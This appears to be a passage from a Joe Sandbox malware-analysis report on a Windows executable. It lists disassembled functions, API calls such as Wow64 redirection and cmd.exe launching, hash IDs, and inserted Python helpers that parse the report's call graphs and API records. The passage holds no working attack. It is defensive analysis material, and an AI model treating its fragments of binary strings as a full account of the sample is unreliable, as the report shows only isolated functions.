                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                    • API String ID: 3256987805-3653653586
                                                                                    • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                    • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                    • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                    • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                      • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                    • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                    • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                                    • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                    • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                    • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                    • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                    • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                    • String ID:
                                                                                    • API String ID: 183575631-0
                                                                                    • Opcode ID: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                    • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                                    • Opcode Fuzzy Hash: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                    • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 0042F403
                                                                                    • GetFocus.USER32 ref: 0042F40B
                                                                                    • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                                    • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 3167913817-1824977358
                                                                                    • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                    • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                                    • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                    • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                                    Control-flow Graph

                                                                                    • 2275 452850-4528a1 [GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress] -> 2276, 2277
                                                                                    • 2276 4528a3-4528aa -> 2277, 2278
                                                                                    • 2277 4528ac-4528ae -> 2279
                                                                                    • 2278 4528b0 -> 2279
                                                                                    • 2279 4528b2-4528e8 [call 42e2bc, call 42e73c, call 403400] -> (function exit)
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                    • API String ID: 1646373207-2130885113
                                                                                    • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                    • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                                    • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                    • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
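The two control_flow_graph dumps above (the functions at 0042F3D4 and 00452850) are exported by the plugin as a single whitespace-separated string of basic blocks and edges. The Python below is an added triage helper, not part of the Joe Sandbox report or its IDA plugin: it parses that string into blocks with their call annotations and then enumerates entry-to-exit paths to separate the API calls that execute on every path from those that depend on a branch. The dump grammar is inferred from these two dumps only, and naming "call <addr>" targets sub_<addr> is this helper's own convention.

```python
"""Parse a Joe Sandbox 'control_flow_graph' dump and summarise which API calls are
unconditional and which are path-dependent.  Added triage helper, not Joe Sandbox code.
Grammar inferred from the two dumps on this page (anything else is an assumption):
  '<id> <start>[-<end>] (call <addr> | <ApiName>)*'  defines a basic block
  '<a>-><b>'                                          is an edge
"""
import re
from dataclasses import dataclass, field

# Both dumps copied verbatim from the report above.
CFG_42F3D4 = (
    "control_flow_graph 2255 42f3d4-42f3de 2256 42f3e0-42f3e3 call 402d30 "
    "2255->2256 2257 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 "
    "2255->2257 2256->2257 2263 42f437-42f43f 2257->2263 2264 42f427-42f431 "
    "RegisterClassA 2257->2264 2265 42f4c6-42f4e2 SetFocus call 403400 2263->2265 "
    "2266 42f445-42f476 CreateWindowExA 2263->2266 2264->2263 2266->2265 "
    "2267 42f478-42f4bc call 42428c call 403738 CreateWindowExA 2266->2267 "
    "2267->2265 2274 42f4be-42f4c1 ShowWindow 2267->2274 2274->2265"
)
CFG_452850 = (
    "control_flow_graph 2275 452850-4528a1 GetModuleHandleA GetProcAddress "
    "GetModuleHandleA GetProcAddress 2276 4528a3-4528aa 2275->2276 2277 4528ac-4528ae "
    "2275->2277 2276->2277 2278 4528b0 2276->2278 2279 4528b2-4528e8 call 42e2bc "
    "call 42e73c call 403400 2277->2279 2278->2279"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-f]{5,8})(?:-([0-9a-f]{5,8}))?$")


@dataclass
class Block:
    bid: str
    start: int
    end: int
    calls: list = field(default_factory=list)   # API names or "sub_<addr>"
    succ: list = field(default_factory=list)    # successor block ids


def parse_cfg(dump: str) -> dict:
    """Return {block_id: Block} with successor lists filled in."""
    toks = dump.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        m = _EDGE.match(t)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
            continue
        # A decimal id followed by a hex address (or range) opens a new block.
        if t.isdigit() and i + 1 < len(toks) and _RANGE.match(toks[i + 1]):
            r = _RANGE.match(toks[i + 1])
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start
            cur = blocks[t] = Block(t, start, end)
            i += 2
            continue
        if cur is None:
            raise ValueError(f"annotation before any block: {t!r}")
        if t == "call":                 # 'call <addr>': internal subroutine, consumes next token
            cur.calls.append(f"sub_{toks[i + 1]}")
            i += 2
        else:                           # bare token: a resolved API name
            cur.calls.append(t)
            i += 1
    for a, b in edges:
        if a not in blocks or b not in blocks:
            raise ValueError(f"edge {a}->{b} references an unknown block")
        blocks[a].succ.append(b)
    return blocks


def entry_and_exits(blocks: dict):
    """Single block with no predecessors, and every block with no successors."""
    targets = {b for blk in blocks.values() for b in blk.succ}
    entry = [bid for bid in blocks if bid not in targets]
    if len(entry) != 1:
        raise ValueError(f"expected exactly one entry block, got {entry}")
    return entry[0], [bid for bid, blk in blocks.items() if not blk.succ]


def all_paths(blocks: dict) -> list:
    """Every simple (cycle-free) path from the entry block to an exit block."""
    entry, exits = entry_and_exits(blocks)
    exits, paths = set(exits), []

    def walk(bid, seen, path):
        if bid in exits:
            paths.append(path)
            return
        for nxt in blocks[bid].succ:
            if nxt not in seen:
                walk(nxt, seen | {nxt}, path + [nxt])

    walk(entry, {entry}, [entry])
    return paths


def call_summary(blocks: dict):
    """(calls on every entry->exit path, calls on only some paths)."""
    per_path = [{c for bid in p for c in blocks[bid].calls} for p in all_paths(blocks)]
    always = set.intersection(*per_path) if per_path else set()
    return always, (set.union(*per_path) - always if per_path else set())
```

For the window-disabler function this reports GetActiveWindow, GetFocus and SetFocus as unconditional, while RegisterClassA, the two CreateWindowExA calls and ShowWindow only run on some of the 16 entry-to-exit paths; for the Wow64 helper every call, including both GetProcAddress lookups, is on all three paths, so the branching after block 2275 does not gate any API call visible in the dump.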
                                                                                    APIs
                                                                                    • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                      • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                                      • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                                    • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                    • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                    • String ID: c:\directory$shell32.dll
                                                                                    • API String ID: 3376378930-1375355148
                                                                                    • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                    • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                                    • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                    • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                                    APIs
                                                                                    • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                    • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                    • API String ID: 4130936913-2943970505
                                                                                    • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                    • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                                    • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                    • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                                      • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                      • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                      • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                      • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                                    • API String ID: 854858120-3415487018
                                                                                    • Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                    • Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
                                                                                    • Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                    • Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
                                                                                    APIs
                                                                                    • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                    • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                    • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                                                    • String ID: 2$MAINICON
                                                                                    • API String ID: 3935243913-3181700818
                                                                                    • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                    • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                                    • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                    • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                      • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                      • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                      • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                      • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                      • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                      • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                      • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                      • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                      • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                      • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                      • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                      • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                    • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                    • API String ID: 3476490787-2767913252
                                                                                    • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                    • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                                    • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                    • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
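The APIs records on this page list one call per bullet, with "Part of subcall function <addr>:" marking calls the plugin attributed to a callee. The Python below is an added triage helper (not Joe Sandbox code) that parses those bullets, copied verbatim from the Ctl3D loader record just above, the Wow64 helper record and the unsymbolized USER32/GDI32 calls, and extracts what an analyst usually wants from them: the export names handed to GetProcAddress, every string argument, the imports per module, and calls the plugin could only name by address. The argument split on "," assumes no string argument contains a comma; the report's argument column is also not always the real argument list, as the Wow64 record shows.

```python
"""Parse the 'APIs' bullets of a Joe Sandbox function record into structured calls
and pull out the dynamically resolved imports.  Added triage helper, not Joe Sandbox
code.  Argument lists are split on ',', which assumes no string argument holds a comma."""
import re
from dataclasses import dataclass
from typing import Optional

# Three records copied verbatim from the report above.
CTL3D_RECORD = """\
  • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
  • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
"""
WOW64_RECORD = """\
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
"""
UNSYMBOLIZED_RECORD = """\
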